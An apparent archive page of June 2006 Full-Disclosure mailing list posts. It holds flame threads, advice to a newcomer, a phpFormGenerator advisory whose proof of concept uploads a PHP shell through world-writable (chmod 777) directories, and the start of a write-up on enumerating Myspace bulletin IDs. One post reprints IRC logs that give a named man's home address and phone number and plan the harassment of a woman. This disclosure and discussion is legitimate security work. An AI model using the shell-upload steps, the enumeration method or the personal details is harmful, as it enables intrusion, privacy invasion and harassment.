Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Advisory from AMIT concern BANTOWNE

2006-06-30 Thread AMIT SECURITY

 Thanks for the 0day advisory! It helped out a lot.


YOU ARE VERY WELCOME SIR.


(ps: 10yrs English course, 10yrs security would have been a better
choice for you if you ask me)


PLEASE DO NOT ATTACK MY ENGLISH. I HAVE TAKED 12 YEARS
OF ENGLISH CLASSES, AND AS I CLEAR STATE IN MY ADVISORY,
MY PROFESSIONAL EXPERIENCE IN SECURITY FIELD EXTENSIVE
OF 20 YEARS. MAYBE YOU WOULD HAVE BETTER CHOICE
WITH YEARS OF LEARNING TO READ. THANKS YOU.

AMIT

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Corporate Virus Threats

2006-06-30 Thread n3td3v

On 6/30/06, Antczak, Ed [EMAIL PROTECTED] wrote:


I second the motion.
An opportunity to focus and filter the broad spectrum of security issues
is welcome if possible.

Edwin Antczak
Windows Engineer


I see a major loophole here, as we don't know how much traffic on the
dedicated securityfocus lists are being moderated, and the potential
useful information being turned away.

Sure, script kid flames may be anti-social, but even they are useful
to a certain audience. (government, law inforcement)

I see a big blackspot right now where high profile moderation of
serious security topics are being moderated into the Securityfocus
profit margin model, than protecting the needs of consumer and
corporate interests.

Its time for an open source full disclosure alternative to the
Securityfocus list-set, in order to really know whats going on,
because you can bet even the stuff the Securityfocus moderators get to
see, is passed onto Symantecs intelligence engine, even if the
moderator doesn't let the thread go live on the securityfocus lists.

I.e. Symantec are getting so much more information than the average
joe, via the intelligence post to moderators, than the public gets to
see, and that frustrates me.

Symantec have a huge intelligence facility in England, its an old
nulcear bunker with huge steal doors, where they compile intelligence
data sent to the list moderators, and only a small percentage of that
goes live to the public.

We need more lists, so people can cross post and see whats really
getting sent to Securityfocus moderators and rejected in all security
specialized subjects, not just new bug disclosure.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Advisory from AMIT concern BANTOWNE

2006-06-30 Thread n3td3v

On 6/30/06, AMIT SECURITY [EMAIL PROTECTED] wrote:

HELLO, MY NAME AMIT. I SECURITY RESEARCH FROM ALL OVER WORLD AND
CURRENTLY THIS MY FIRST ADVISORY TO ANYONE RESARCHING. I POST TO
MAILING LIST IN INTEREST OF EXPULSION OF KNOWLEDGE.

RECENTLY I HEAR OF FREENODE ATTACK AND SOME OPERATORS OWNED FROM
SNIFFING OR SOMETHING LIKE THAT. THIS VERY BAD BUT IT HAPPEN IN MY
COUNTRY ALL TIME. I SAY TO MYSELF, AMIT, YOU MUST HELP CATCH CRIMINAL
WHO DO THIS TO NON-PROFIT ORGANISATION SO I SET OUT TO LEARN ALL THAT
I CAN ABOUT THAT CRIMINAL. I FIND OUT TWO GROUP ARE MAY BE TO BLAME,
GNNA AND BANTOWNE.  GNNA STAND FOR GAY NATIONAL NARCOTICS ALLEGIANCE
MY FRIEND FROM WORK SAY, BUT HE NOT KNOW WHAT BANTOWNE STAND FOR. I
FIND NO INFO ON GAY NATIONAL NARCOTICS ALLIANCE, AND MY INTUITION
TELL ME BANTOWNE TO BLAME.  SO THROUGH DEVIOUS MEANS I INFILTRATE
BANTOWNE IRC CHANNEL WITH IS LOCATED AT IRC.BANTOWN.ORG (NOTE: IT
MINUS THE E) AND THE CHANNEL IS HIDDEN BUT STILL I FIND IT. IT
CALLED #BANTOWN (MINUS THE E TOO).

THIS IRC CHANNEL IS FULL OF THE BADDEST SCRIPT KIDDIE I HAVE SEEN IN A
LONG WHILE, AND I WORK ON SECURITY FOR OVER 20 YEAR, EVEN BEFORE
MODERN PC ARE COMMONPLACE AS USER. EVEN SOME PEOPLE IN CHANNEL KNOW
PERL OR OTHER USEFUL LANGUAGE. I VERY IMPRESSED. SOME FRIENDLY PEOPLE
IN CHANNEL, LOT OF THEM SAY LOL MOST TIME THEY SPEAK. SOME NOT SO
FRIENDLY, SAY BAD WORD BUT THAT OK, THEY CRIMINAL SO WHO CARE. I
PRESENT FRIENDLY APPEARANCE, THEY TALK FRIENDLY TO ME. THIS NIGHT OF
FREENODE HACK NEWS AND THEY PISSED OFF AT LILO, WHO SEEM TO BE SEMI
TRUCK DRIVER AND LIVE IN BACK OF TRUCK IN TRUCK TRAILER, CAUSE THEY
SAY HE LOTS OF BAD THINGS. SOME OF THEM BE VERY SKILLED PROFESSIONAL
AT HACK. ONE GO BY INCOG AND HE MASTER OF CROSSED-SITE-SCRIPTING
VULNERABILITY. HE SURF SITES LOOKING FOR VULNERABILITY ALL DAY LONG. I
EXCERPT FROM CHANNEL:

incog that reminds me... ill go find xss in fark.com
incog k, i just found xss in imdb... but my memory is so bad that i
dont know if this is new or i just rediscovered it
incog just found xss in youtube
incog i have xss on flickr
incog xss on technocrati
incog weev, i have xss on all turdpress blogs ever
lncog i just found dailykos xss for rolloffle
whatcog I have SA xss
whatcog on secure.somethingawful.com

THAT OVER FEW DAYS OF TALK. INCOG SEEM TO BE MOST BRUTAL SCRIPT-KIDDIE
KNOWN TO MAN, BUT WE CHECK OUT ANOTHER PERSON HE CALLED WEEV. HE
BEEN AROUND THE BLOCK A LONG TIME AND HE HAVE MANY IDEA HOW TO CAUSE
DAMAGE TO FREENODE AND A MAN NAME LILO. AGAIN I EXCERPT FROM
CHANNEL:

weev okay guys
weev i need you to find some mexican woman in houston
weev and just relentlessly troll her
weev call her up at all hours of the night
weev screaming ROB LEVIN, ROB LEVIN
weev and then we're going to say she's the nanny for his kids

WEEVE ALSO ENCOURAGE INGOC TO HACKING ACTIVITIES, PROBABLY FOR HIS
OWN USAGE LATER ON. I EXCERPT:

weev incog: can you get flickr?
incog ill try
cstone oh god flickr would be hilarious
incog flickr uses yahoo id's
weev not necessarily
weev there are internal flickr ids too
weev and it doesnt use the yahoo cookie
weev basically you auth with your yahoo id
weev and then it gives you a flickr cookie
weev and from there its all flickr

LIKE SAID, WEEV KNOW A LOT AND PROBABLY RINGLEADER, OR AS THEY SAID
IN AMERICA, MASTER OF PUPPETS. AND I DO THINK MANY PEOPLE ON THE
CHANNEL PUPPETS. SOME VERY SCRIPT-KIDDIE LIKE. WELL, IT OBVIOUS ALL
ARE SCRIPT KIDDIE, BUT SOME ARE VERY. VERY. MOST ALSO IRC KIDDIE. I
EXCERPT:

tem they unbelievers must be purged
tem they unbelievers must be purged
tem they unbelievers must be purged
tem they unbelievers must be purged
tem they unbelievers must be purged
tem they unbelievers must be purged
bizzy WHY IS SALAD SO GOOD?!!?!
bizzy WHY IS SALAD SO GOOD?!!?!
bizzy WHY IS SALAD SO GOOD?!!?!

AS YOU CAN SEE, SOME VERY DUMB AND NOT UNDERSTAND IRC CLIENT PROPERLY.
THERE MANY MORE EXAMPLE OF ABOVE EXCERPT, BUT I LIMIT TO THAT CAUSE IS
ANNOYING. BUT WORSE IS YET TO COME, B/C WEEAVE POST PERSONAL
INFOMATION OF ROBERT LIVIN, OTHERWISE KNOWN AS LELO ON FREENODE
NETWORK, THE TRUCK DRIVER, FOR PLANE VIEW OF ALL TO ABUSE. BANTOWN
ALSO RESPONSIBLE FOR POST OF INFORMATION TO CRAIGLIST AND OTHER
PLACES. I EXCERPT BUT MUST CENSOR SO THIS INFO IS NOT USED FOR CRIME:

weev philsanchez: lilo's federal employer identification number is xx-xxx
weev his federal identification number is xx-xxx
weev the address officially listed for pdpc is 10100 main street #31
houson tx 77025
weev phone number for pdpc officially listed is 713-589-5863
weev his ssn is xxx xx 
weev his dob is xx-xx-1955
weev 11-digit texas state taxpayer number xxx
weev ROBERT LEVIN
weev 9212 BURDINE ST. #1005
weev HOUSTON, TX 77096
weev the last address is his apartment
weev no, he doesnt live in a trailer

MANY ON #BANTOON SPEAK HIGHLY OF RUIN, WHICH IS SKRIPT-KIDDIE FOR
CAUSE HAVOK ON IRC OR NETWORK OR SOME MAIL PROGRAMS. SOME ALSO EAT
SALAD OR DISPLAY ANNOYING QUIRK WHERE THEY NOT 

Re: [Full-disclosure] Advisory from AMIT concern BANTOWNE

2006-06-30 Thread Cardoso
A free advice:

Use your capslock key. 

You do not want to be seen as a newbie or script kid using 1337 speak.

Real people over 12 with IQs over 45 don't write in 1337 speak OR use
all caps. 

One of the first hints to detect a phishing mail/website is bad grammar
and lack of respect to writing rules, like using, like or like, StRanGe
CaPiTaLiZatIONS and other newbie behaviours. 




On Fri, 30 Jun 2006 12:14:59 -0500
AMIT SECURITY [EMAIL PROTECTED] wrote:

AS   Thanks for the 0day advisory! It helped out a lot.
AS 
AS YOU ARE VERY WELCOME SIR.
AS 
AS  (ps: 10yrs English course, 10yrs security would have been a better
AS  choice for you if you ask me)
AS 
AS PLEASE DO NOT ATTACK MY ENGLISH. I HAVE TAKED 12 YEARS
AS OF ENGLISH CLASSES, AND AS I CLEAR STATE IN MY ADVISORY,
AS MY PROFESSIONAL EXPERIENCE IN SECURITY FIELD EXTENSIVE
AS OF 20 YEARS. MAYBE YOU WOULD HAVE BETTER CHOICE
AS WITH YEARS OF LEARNING TO READ. THANKS YOU.
AS 
AS AMIT
AS 
AS ___
AS Full-Disclosure - We believe in it.
AS Charter: http://lists.grok.org.uk/full-disclosure-charter.html
AS Hosted and sponsored by Secunia - http://secunia.com/
AS 

year(now) + 1 será o ano do linux!
Cardoso [EMAIL PROTECTED] - SkypeIn: (11) 3711-2466 / (41) 3941-5299
vida digital: http://www.contraditorium.com site pessoal e blog: 
http://www.carloscardoso.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


RE: [Full-disclosure] Advisory from AMIT concern BANTOWNE

2006-06-30 Thread Debasis Mohanty
IS YOUR *caps lock* DAMAGED BEYOND REPAIR?? 

-d

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of AMIT
SECURITY
Sent: Friday, June 30, 2006 10:45 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Advisory from AMIT concern BANTOWNE

  Thanks for the 0day advisory! It helped out a lot.

YOU ARE VERY WELCOME SIR.

 (ps: 10yrs English course, 10yrs security would have been a better 
 choice for you if you ask me)

PLEASE DO NOT ATTACK MY ENGLISH. I HAVE TAKED 12 YEARS OF ENGLISH CLASSES,
AND AS I CLEAR STATE IN MY ADVISORY, MY PROFESSIONAL EXPERIENCE IN SECURITY
FIELD EXTENSIVE OF 20 YEARS. MAYBE YOU WOULD HAVE BETTER CHOICE WITH YEARS
OF LEARNING TO READ. THANKS YOU.

AMIT

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] New member asking question...

2006-06-30 Thread n3td3v

On 6/30/06, Reynolds, Joseph R [EMAIL PROTECTED] wrote:


Question for everyone on the board?

I have been reading the posts over the past few weeks, and am wondering
how the heck you guy discover these vulnerabilities.  Granted, I am
still very new to the IS world, but I cannot begin to understand how you
discover weaknesses.  After reading these posts, the explanation always
makes since, but are you guys actively seeking weaknesses, or just
happen to come across them?

Also, are there any good Hacking books that I could read?  I have had
a Hackers Tool and Techniques class at school, but all of the programs
are very outdated, like l0phtcrack, JTR, ethereal or wireshark, and
such.  I am looking to actually enter systems or find ways to enter
systems and understand the weakness that allows it so I can avoid it
later.

Thanks everyone.


Joseph K. Reynolds
Systems Support Analyst - Intermediate
Enterprise Rent-A-Car
Email JR Reynolds
314-512-2370


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Two kinds of hackers:

1. Homemade hackers, typically loners with social problems who spend
their time infront of computers to feed their social stimulation via
the international wide area network. They have so much free time that
they've learned how to hack on their own steam. Because of the lack of
social background, advanced users in this group, have the time to
discover and research ground breaking security and penetration
techniques of major vendors, with a real threat to the single mom and
retired couple commmity, as well as a threat to corporate and
government interests.

2. The guy who went to high school past grades, have friends, socail
circles, go out and live a great life.

They all of a sudden decide they want to goto university, they goto a
computer science course dedicated to ethical hacking, where they learn
the in's and out's of hacking corporate infrastructure. They often
post to the internet on college computers, showing off skills they've
just recently learnt by the lecturer, (Matthew Murphy, *cough*) and
get full media coverage by all the major security outlets (*cough*
Robert Lemos). This is of course a great mis justice to the real
people who dedicate their entire social and educational life to the
subject as noted in example 1.

Additionally - Theres always going to be a balance between home made
hackers (example 1) and manufactured hackers (example 2).

Finally - The very fact you've asked the question you've stated leads
me to believe you fall into example 2, as someone who falls into
example 2 would never post this kind of message to the international
WAN security community, respectively.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] New member asking question...

2006-06-30 Thread Valdis . Kletnieks
On Fri, 30 Jun 2006 11:47:37 CDT, Reynolds, Joseph R said:

 Also, are there any good Hacking books that I could read?  I have had
 a Hackers Tool and Techniques class at school, but all of the programs
 are very outdated, like l0phtcrack, JTR, ethereal or wireshark, and

I wouldn't call any of these outdated - they're still some of the best
tools in their categories.

 such.  I am looking to actually enter systems or find ways to enter
 systems and understand the weakness that allows it so I can avoid it
 later. 

It turns out that you don't actually need to be very good at *finding*
weaknesses in order to secure against it.  All you need is a good grasp
of what general classes of vulnerabilities there are, and what they can gain
an attacker.  If you need to look at actual code, I'd suggest getting a
copy of Metasploit, and just *looking* at it.  Look at the payloads section,
as that will give you a good idea of the sorts of payloads you might get
hit with.  Then just assume that the Bad Guy has an exploit for any given
outward-facing code and resource on your system...

If you want to be scared about how many exploits are already out there,
look at Nessus or the Packetstormsecurity archives. ;)

In order to secure against this, the proper method is:

0) Simply applying all the current patches for your system, and properly
configuring it, will go a *long* way.  Two good resources:

Center for Internet Security (http://www.cisecurity.org)
the NSA security guides 
(http://www.nsa.gov/snac/downloads_os.cfm?MenuID=scg10.3.1.1)

(Basically, these go through all the high-risk issues discussed in 1-4 below,
and give you a easy cookbook so you don't have to re-do the research.
Disclaimer: I'm one of the perpetrators for the various CIS Unix/Linux guides,
so I'm a bit biased.)

The two biggest areas those guides don't address in depth are social engineering
and abuse of inter-machine trust relationships (if you manage to find a
weak password on one box, and then get into a second because there's a
file share or SSH key or similar...)

1) Pick a piece of code or resource that an attacker could potentially attack
(for instance, your Apache server, or a Windows file share.

2) *ASSUME* that the attacker has a Magic Bullet that can exploit it.  You
don't need to *find* one, just proceed as if the bad guy did all the hard work
and found it.

3) Start looking at ways to mitigate and control the damage.  For instance,
many buffer overflow Magic Bullets can be stopped with Run Apache with
non-exec stack.  Many own the file share Bullets can be stopped with either
don't export share to world or firewall the Windows fileshare ports. And so
on.

4) Lather, rinse, repeat for all the attacks you can think of.


pgpADwmgTBIhK.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] New member asking question...

2006-06-30 Thread n3td3v

On 6/30/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:

On Fri, 30 Jun 2006 11:47:37 CDT, Reynolds, Joseph R said:

 Also, are there any good Hacking books that I could read?  I have had
 a Hackers Tool and Techniques class at school, but all of the programs
 are very outdated, like l0phtcrack, JTR, ethereal or wireshark, and

I wouldn't call any of these outdated - they're still some of the best
tools in their categories.

 such.  I am looking to actually enter systems or find ways to enter
 systems and understand the weakness that allows it so I can avoid it
 later.

It turns out that you don't actually need to be very good at *finding*
weaknesses in order to secure against it.  All you need is a good grasp
of what general classes of vulnerabilities there are, and what they can gain
an attacker.  If you need to look at actual code, I'd suggest getting a
copy of Metasploit, and just *looking* at it.  Look at the payloads section,
as that will give you a good idea of the sorts of payloads you might get
hit with.  Then just assume that the Bad Guy has an exploit for any given
outward-facing code and resource on your system...

If you want to be scared about how many exploits are already out there,
look at Nessus or the Packetstormsecurity archives. ;)

In order to secure against this, the proper method is:

0) Simply applying all the current patches for your system, and properly
configuring it, will go a *long* way.  Two good resources:

Center for Internet Security (http://www.cisecurity.org)
the NSA security guides 
(http://www.nsa.gov/snac/downloads_os.cfm?MenuID=scg10.3.1.1)

(Basically, these go through all the high-risk issues discussed in 1-4 below,
and give you a easy cookbook so you don't have to re-do the research.
Disclaimer: I'm one of the perpetrators for the various CIS Unix/Linux guides,
so I'm a bit biased.)

The two biggest areas those guides don't address in depth are social engineering
and abuse of inter-machine trust relationships (if you manage to find a
weak password on one box, and then get into a second because there's a
file share or SSH key or similar...)

1) Pick a piece of code or resource that an attacker could potentially attack
(for instance, your Apache server, or a Windows file share.

2) *ASSUME* that the attacker has a Magic Bullet that can exploit it.  You
don't need to *find* one, just proceed as if the bad guy did all the hard work
and found it.

3) Start looking at ways to mitigate and control the damage.  For instance,
many buffer overflow Magic Bullets can be stopped with Run Apache with
non-exec stack.  Many own the file share Bullets can be stopped with either
don't export share to world or firewall the Windows fileshare ports. And so
on.

4) Lather, rinse, repeat for all the attacks you can think of.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





Valdis falls into example 2 of my discussion:

2. The guy who went to high school past grades, have friends, socail
circles, go out and live a great life.


They all of a sudden decide they want to goto university, they goto a
computer science course dedicated to ethical hacking, where they learn
the in's and out's of hacking corporate infrastructure. They often
post to the internet on college computers, showing off skills they've
just recently learnt by the lecturer, (Matthew Murphy, *cough*) and
get full media coverage by all the major security outlets (*cough*
Robert Lemos). This is of course a great mis justice to the real
people who dedicate their entire social and educational life to the
subject as noted in example 1.


Additionally - Theres always going to be a balance between home made
hackers (example 1) and manufactured hackers (example 2).


Finally - The very fact you've asked the question you've stated leads
me to believe you fall into example 2, as someone who falls into
example 1 would never post this kind of message to the international
WAN security community, respectively.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] New member asking question...

2006-06-30 Thread Michael Holstein

I have been reading the posts over the past few weeks, and am wondering
how the heck you guy discover these vulnerabilities.  Granted, I am
still very new to the IS world, but I cannot begin to understand how you
discover weaknesses.  After reading these posts, the explanation always
makes since, but are you guys actively seeking weaknesses, or just
happen to come across them?


Learn how things are *supposed* to work (for example, write your own 
webserver in C), then intentionally throw broken requests at it. 
Eventually you'll find a result you *didn't* expect, and that's what you 
should investigate. Knowing *what* is broken is never as important as *why*.


As mentioned by another, learning to dream in C, and understanding asm 
go a *long* way.


Oh .. and one more note .. practice on your own stuff. It's easy to get 
arrested in the process of learning if you're not careful. When you get 
good at it, play nice and adhere to the rules of responsible 
disclosure (search the archives for lengthy threads on this seperate issue)


/mike.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Advisory from AMIT concern BANTOWNE

2006-06-30 Thread AMIT SECURITY

i am sorry, did not realize cap key is turned on. will type off now. thanks
you to n3td3v for farther information of bantowne.

amit

On 6/30/06, Debasis Mohanty [EMAIL PROTECTED] wrote:

IS YOUR *caps lock* DAMAGED BEYOND REPAIR??

-d

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of AMIT
SECURITY
Sent: Friday, June 30, 2006 10:45 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Advisory from AMIT concern BANTOWNE

  Thanks for the 0day advisory! It helped out a lot.

YOU ARE VERY WELCOME SIR.

 (ps: 10yrs English course, 10yrs security would have been a better
 choice for you if you ask me)

PLEASE DO NOT ATTACK MY ENGLISH. I HAVE TAKED 12 YEARS OF ENGLISH CLASSES,
AND AS I CLEAR STATE IN MY ADVISORY, MY PROFESSIONAL EXPERIENCE IN SECURITY
FIELD EXTENSIVE OF 20 YEARS. MAYBE YOU WOULD HAVE BETTER CHOICE WITH YEARS
OF LEARNING TO READ. THANKS YOU.

AMIT

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Weird... www.eon8.com

2006-06-30 Thread Jay Buhrt
Does anyone know about this site, or the projects related to it? 
www.eon8.com ?


--
Jay Buhrt
Achievement Focused Technology, Inc.
[EMAIL PROTECTED]
574-538-8944

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] phpFormGenerator

2006-06-30 Thread Morning Wood

 - EXPL-A-2006-004 exploitlabs.com Advisory 049 -
   - phpFormGenerator -




AFFECTED PRODUCTS
=
phpFormGenerator  v2.09
http://phpformgen.sourceforge.net/


OVERVIEW

phpFormGenerator is an easy-to-use tool to create reliable 
and efficient web forms in a snap. No programming of any 
sort is required. Just follow along the phpFormGenerator 
wizard and at the end, you will have a fully functional web 
form!


note:
as stated by the vendor this script is widely used with cPanel
and other hosting provider solutions.



DETAILS
===
phpFormGenerator by default installs all directories
as chmod 777 and will not function if they are not set as such.

in the readme:
3. Set read+write+execute file permissions on the 'forms'
directory and *everything* inside it 
(including all subdirectories and files)


UNIX:
chmod -R 777 forms

in process2.php:
please make sure that the forms directory (and everything in it)
has read+write access. you can achieve this by issuing the following
command on linux/unix:
chmod -R 777 forms


researcher note:
when the applications directories are not set 777 the app errors with:


File and Directory permissions 
The forms directory is not writeable.

The forms/admin directory is not writeable.
The use directory is not writeable.
Please give read+write permissions to all the files
and directories mentioned above. Refresh this page
after you have done so.


SOLUTION

vendor contact:
Musawir Ali [EMAIL PROTECTED] June 30, 2006

patch: none ( see vendor response )


VENDOR RESPONSE
===
there are no security flaws ... if you had taken a moment to think,
you would realize that a a major software company such as cPanel would
not be shipping phpFormGenerator with their scripts if it had flaws.
In any case, the program has been thoroughly tested by myself and
other security experts and is not known to have any issues.

777 is never forced, the suggested method is to give write permissions
to the group the process belongs to.
upload function is insecure. arbitrary php functions are insecure...
could you be any more vague? You seem to be one of those ignorant
nuts who shout slogans like windows sucks linux owns your server
is insecure without realizing the garbage spooling out of your mouth.

you're wasting my time.
btw.. just so that you know, i have been on openbsd's development
team, written the opengl kit for the openbeos OS project (now Haiku),
and am an official GNU maintainer:
http://www.gnu.org/people/people.html (search for my name) ... what
you should be doing is thinking about how contributing to the
opensource community and not being a bitch.



PROOF OF CONCEPT

1.browse to the default install directory

2.create new form with the file upload function

3.complete the form using Insert data to MySQL database table? = no

4.as directed browse to http://[host]/[appdir]/[newform_name]/form1.html;

5.upload phpshell type of script

6.if you supplied an email address, the link will be sent to you
  http://[host]/[appdir]/[newform_name]/files/thescript_name_generated.php


CREDITS
===
This vulnerability was discovered and researched by 
Donnie Werner of exploitlabs


Donnie Werner
Information Security Specialist
[EMAIL PROTECTED]
[EMAIL PROTECTED]

--
web: http://exploitlabs.com

http://exploitlabs.com/files/advisories/EXPL-A-2006-004-phpformgen.txt

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Advisory from AMIT concern BANTOWNE

2006-06-30 Thread Vidar Løkken

On Fri, 30 Jun 2006, AMIT SECURITY wrote:


i am sorry, did not realize cap key is turned on. will type off now. thanks
you to n3td3v for farther information of bantowne.


We did not mean that you can not use your shift key for normal 
capitalization...

--
MVH,
Vidar
God doesn't play dice.
-- Albert Einstein

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] phpFormGenerator

2006-06-30 Thread pingywon

btw.. just so that you know, i have been on openbsd's development

team, written the opengl kit for the openbeos OS project (now Haiku),
and am an official GNU maintainer:
http://www.gnu.org/people/people.html (search for my name) ... what
you should be doing is thinking about how contributing to the
opensource community and not being a bitch.



...just so you KNOW

see how popular he is...there cant be any flaws in his software.hes 
popular


~pingywon MCSE
www.pingywon.com
www.illmob.org
www.freeillwill.com




- Original Message - 
From: Morning Wood [EMAIL PROTECTED]

To: full-disclosure@lists.grok.org.uk
Sent: Friday, June 30, 2006 5:11 PM
Subject: [Full-disclosure] phpFormGenerator



 - EXPL-A-2006-004 exploitlabs.com Advisory 049 -
   - phpFormGenerator -




AFFECTED PRODUCTS
=
phpFormGenerator  v2.09
http://phpformgen.sourceforge.net/


OVERVIEW

phpFormGenerator is an easy-to-use tool to create reliable and efficient 
web forms in a snap. No programming of any sort is required. Just follow 
along the phpFormGenerator wizard and at the end, you will have a fully 
functional web form!


note:
as stated by the vendor this script is widely used with cPanel
and other hosting provider solutions.



DETAILS
===
phpFormGenerator by default installs all directories
as chmod 777 and will not function if they are not set as such.

in the readme:
3. Set read+write+execute file permissions on the 'forms'
directory and *everything* inside it (including all subdirectories and 
files)


UNIX:
chmod -R 777 forms

in process2.php:
please make sure that the forms directory (and everything in it)
has read+write access. you can achieve this by issuing the following
command on linux/unix:
chmod -R 777 forms


researcher note:
when the applications directories are not set 777 the app errors with:


File and Directory permissions The forms directory is not writeable.
The forms/admin directory is not writeable.
The use directory is not writeable.
Please give read+write permissions to all the files
and directories mentioned above. Refresh this page
after you have done so.


SOLUTION

vendor contact:
Musawir Ali [EMAIL PROTECTED] June 30, 2006

patch: none ( see vendor response )


VENDOR RESPONSE
===
there are no security flaws ... if you had taken a moment to think,
you would realize that a a major software company such as cPanel would
not be shipping phpFormGenerator with their scripts if it had flaws.
In any case, the program has been thoroughly tested by myself and
other security experts and is not known to have any issues.

777 is never forced, the suggested method is to give write permissions
to the group the process belongs to.
upload function is insecure. arbitrary php functions are insecure...
could you be any more vague? You seem to be one of those ignorant
nuts who shout slogans like windows sucks linux owns your server
is insecure without realizing the garbage spooling out of your mouth.

you're wasting my time.
btw.. just so that you know, i have been on openbsd's development
team, written the opengl kit for the openbeos OS project (now Haiku),
and am an official GNU maintainer:
http://www.gnu.org/people/people.html (search for my name) ... what
you should be doing is thinking about how contributing to the
opensource community and not being a bitch.



PROOF OF CONCEPT

1.browse to the default install directory

2.create new form with the file upload function

3.complete the form using Insert data to MySQL database table? = no

4.as directed browse to http://[host]/[appdir]/[newform_name]/form1.html;

5.upload phpshell type of script

6.if you supplied an email address, the link will be sent to you
  http://[host]/[appdir]/[newform_name]/files/thescript_name_generated.php


CREDITS
===
This vulnerability was discovered and researched by Donnie Werner of 
exploitlabs


Donnie Werner
Information Security Specialist
[EMAIL PROTECTED]
[EMAIL PROTECTED]

--
web: http://exploitlabs.com

http://exploitlabs.com/files/advisories/EXPL-A-2006-004-phpformgen.txt

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] New member asking question...

2006-06-30 Thread Valdis . Kletnieks
On Fri, 30 Jun 2006 20:20:26 BST, n3td3v said:

 Valdis falls into example 2 of my discussion:
 
 2. The guy who went to high school past grades, have friends, socail
 circles, go out and live a great life.

Don't presume to be sure over which example I'm more like.  Also, you
seem to be convinced that there's a binary distinction, and that nobody
can be a member of both groups at once.

Also, note the context of the original question:

  systems and understand the weakness that allows it so I can avoid it
  later.

The skillset of a good defender (who is trying to avoid it later) is quite
different from the skillset of a good attacker.  Now, if he had been asking
how to be a good attacker, he'd have gotten a different list of suggestions...



pgpGaUCKHabvd.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Data Mining Myspace Bulletins

2006-06-30 Thread John Hackenger

Myspace Bulletins: The good, the bad, and the ugly

Data Mining Myspace, a case study

Author: stderr ([EMAIL PROTECTED])
http://stderr.linuxinit.net

Original release:
http://www.pandora-security.com

--

1. Abstract

We all know about myspace.com, and I'll go ahead and admit
that I actually have an account to keep up with friends.
Myspace is full of a bunch of idiots, but it can be a great
tool for keeping up with people... when used properly.

Myspace has long been a hacker playground, you may remember
the infamous Samy is my hero worm. The worm took advantage
of several poor input validation techniques which were being
employed. Each person that went to a page with his script in it,
automatically sent him a friend request. After this alarming
stunt, Myspace fixed a lot of the injection vulnerabilities.

--

2. Introduction to Bulletins

On Myspace, you can send bulletins which are sent to all
of the friends on your list. That way if you're going on
vacation or something, you can let ALL of your friends know
what's happening by sending only one message. Most people
assume that only their friends can read the bulletins they
post... they are sadly mistaken.

When you open up a bulletin, you go to a url like the following.

http://bulletin.myspace.com/index.cfm?fuseaction=bulletin.readmessageID=1

Yes, you guessed it. If you change the messageID number,
you can view any bulletin on Myspace that hasn't yet
expired. Now, if we could just collect a ton of bulletins,
then we could surely find some juicy information like
cell phone numbers, when people are leaving for vacation,
where they're going... the list goes on and on.

The implementation of bulletins so that everyone can view them
may be intentional, but most people assume that bulletins are
only readable by friends. Because of this belief, many people
post personal details in bulletins, never expecting people
like you to read them. The mere existence of the Delete from
friends button implies that only friends should be able to
read your bulletins.

--

3. Mining the data

I was able to whip together a small C program that generates
urls, retrieves the bulletin, and saves the html to a file.
